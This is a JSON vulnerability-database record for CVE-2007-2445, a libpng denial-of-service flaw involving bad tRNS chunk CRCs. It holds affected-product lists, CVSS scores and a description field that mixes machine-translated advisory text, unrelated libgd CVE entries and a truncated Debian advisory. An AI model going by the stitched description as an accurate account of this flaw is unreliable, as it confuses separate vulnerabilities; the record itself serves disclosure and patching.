        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "linux advanced workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1"
      },
      {
        "model": "rhel desktop workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (client)"
      },
      {
        "model": "express5800/fw",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.6,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux mandrake x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2007.0"
      },
      {
        "model": "libpng3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.2.12"
      },
      {
        "model": "enterprise linux cluster-storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "multi network firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.0"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux supplementary server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "enterprise linux desktop multi os client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.17"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": "10.0x86"
      },
      {
        "model": "libpng",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.25"
      },
      {
        "model": "libpng3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.2.11"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rpath",
        "version": "1"
      },
      {
        "model": "corporate server x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "4.0"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0"
      },
      {
        "model": "ccs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "android software development kit m3-rc37a",
        "scope": null,
        "trust": 0.3,
        "vendor": "google",
        "version": null
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.18"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "personal",
        "scope": null,
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": null
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "libpng3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.2.1"
      },
      {
        "model": "appliance server hosting edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": "1.0"
      },
      {
        "model": "enterprise linux desktop version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "ccs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1.1"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.7"
      },
      {
        "model": "linux mandrake x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2007.1"
      },
      {
        "model": "advanced workstation for the itanium processor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.13"
      },
      {
        "model": "fuji",
        "scope": null,
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": null
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "libpng3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.2.10"
      },
      {
        "model": "enterprise linux ws ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "linux foresight linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "foresight",
        "version": "1.1"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "android software development kit m5-rc15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "google",
        "version": null
      },
      {
        "model": "messaging storage server mm3.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "messaging storage server",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "engine irrlicht engine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "irrlicht",
        "version": "1.3.1"
      },
      {
        "model": "solaris 8 sparc",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "terminal server project linux terminal server project",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "appliance server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": "2.0"
      },
      {
        "model": "ccs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "9"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2007.1"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "e1.0-solid",
        "scope": null,
        "trust": 0.3,
        "vendor": "openpkg",
        "version": null
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.14"
      },
      {
        "model": "desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "home",
        "scope": null,
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": null
      },
      {
        "model": "fuji",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": "0"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2007.0"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.6"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "terminal server project linux terminal server project",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "5.0"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.12"
      },
      {
        "model": "engine irrlicht engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "irrlicht",
        "version": "1.1"
      },
      {
        "model": "corporate server x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "3.0"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.8"
      },
      {
        "model": "message networking",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "enterprise linux optional productivity application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "4.0"
      },
      {
        "model": "enterprise linux virtualization server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "appliance server workgroup edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": "1.0"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.9"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "messaging storage server mss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "libpng3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.2.7"
      },
      {
        "model": "advanced workstation for the itanium processor ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "solaris 8 x86",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "fedora core5",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "libpng",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.2.17"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.11"
      },
      {
        "model": "enterprise linux desktop supplementary client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "ses",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": "10.0"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": "10.0"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "f...",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": "10"
      },
      {
        "model": "enterprise linux as ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "ses",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1.1"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "10"
      },
      {
        "model": "libpng3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.2.8"
      },
      {
        "model": "message networking mn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "libpng3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.2.0"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "fedora core6",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.16"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1.3"
      },
      {
        "model": "broker ftp server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "transsoft",
        "version": "8.0"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.5"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "propack sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "libpng3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.2.5"
      },
      {
        "model": "engine irrlicht engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "irrlicht",
        "version": "1.2"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "enterprise linux hardware certification",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "solaris 10 x86",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "current",
        "scope": null,
        "trust": 0.3,
        "vendor": "openpkg",
        "version": null
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.10"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "enterprise linux desktop workstation client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "0.90"
      },
      {
        "model": "ses",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "libpng",
        "version": "1.0.15"
      },
      {
        "model": "solaris 9 x86",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "3.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "engine irrlicht engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "irrlicht",
        "version": "1.3"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.2"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": "10.0.0x64"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0.1"
      },
      {
        "model": "enterprise linux es ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux clustering server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "multimedia",
        "scope": null,
        "trust": 0.3,
        "vendor": "turbolinux",
        "version": null
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#684664"
      },
      {
        "db": "BID",
        "id": "24000"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000397"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2445"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:png_reference_library:libpng:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.15",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:png_reference_library:libpng:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.2.16",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-2445"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Glenn Randers-Pehrson",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2007-2445",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2007-2445",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-2445",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#684664",
            "trust": 0.8,
            "value": "3.86"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200705-347",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#684664"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000397"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2445"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The png_handle_tRNS function in pngrutil.c in libpng before 1.0.25 and 1.2.x before 1.2.17 allows remote attackers to cause a denial of service (application crash) via a grayscale PNG image with a bad tRNS chunk CRC value. The libpng library contains a denial-of-service vulnerability. libpng There is a service disruption (DoS) Vulnerabilities exist PNG (Portable Network Graphics) Format image processing library libpng of png_handle_tRNS() Functions include CRC Incorrect processing after check PNG Denial of service when processing files (DoS) There is a vulnerability that becomes a condition.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) It may be in a state. \nSuccessful exploits may allow remote attackers to cause denial-of-service conditions on computers running the affected library. \nThis issue affects \u0027libpng\u0027 1.2.16 and prior versions. \n\nCVE-2007-3476\n\n    An array indexing error in libgd\u0027s GIF handling could induce a\n    denial of service (crash with heap corruption) if exceptionally\n    large color index values are supplied in a maliciously crafted\n    GIF image file. \n\nCVE-2007-3477\n\n    The imagearc() and imagefilledarc() routines in libgd allow\n    an attacker in control of the parameters used to specify\n    the degrees of arc for those drawing functions to perform\n    a denial of service attack (excessive CPU consumption). \n\nCVE-2007-3996\n\n    Multiple integer overflows exist in libgd\u0027s image resizing and\n    creation routines; these weaknesses allow an attacker in control\n    of the parameters passed to those routines to induce a crash or\n    execute arbitrary code with the privileges of the user running\n    an application or interpreter linked against libgd2. \n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1750-1                  security@debian.org\nhttp://www.debian.org/security/                           Florian Weimer\nMarch 22, 2009                        http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage        : libpng\nVulnerability  : several\nProblem type   : local (remote)\nDebian-specific: no\nCVE Id(s)      : CVE-2007-2445 CVE-2007-5269 CVE-2008-1382 CVE-2008-5907 CVE-2008-6218 CVE-2009-0040\nDebian Bug     : 446308 476669 516256 512665\n\nSeveral vulnerabilities have been discovered in libpng, a library for\nreading and writing PNG files. (CVE-2008-1382)\n\nThe png_check_keyword might allow context-dependent attackers to set the\nvalue of an arbitrary memory location to zero via vectors involving\ncreation of crafted PNG files with keywords. (CVE-2009-0040)\n\nFor the old stable distribution (etch), these problems have been fixed\nin version1.2.15~beta5-1+etch2. \n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 1.2.27-2+lenny2.  (Only CVE-2008-5907, CVE-2008-5907 and\nCVE-2009-0040 affect the stable distribution.)\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.35-1. \n\nWe recommend that you upgrade your libpng packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz\n    Size/MD5 checksum:   829038 77ca14fcee1f1f4daaaa28123bd0b22d\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz\n    Size/MD5 checksum:    18622 e1e1b7d74b9af5861bdcfc50154d2b4c\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc\n    Size/MD5 checksum:     1033 a0668aeec893b093e1f8f68316a04041\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb\n    Size/MD5 checksum:      882 eb0e501247bd91837c090cf3353e07c6\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb\n    Size/MD5 checksum:   214038 1dd9a6d646d8ae533fbabbb32e03149a\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb\n    Size/MD5 checksum:   204478 d04c5a2151ca4aa8b1fa6f1b3078e418\n  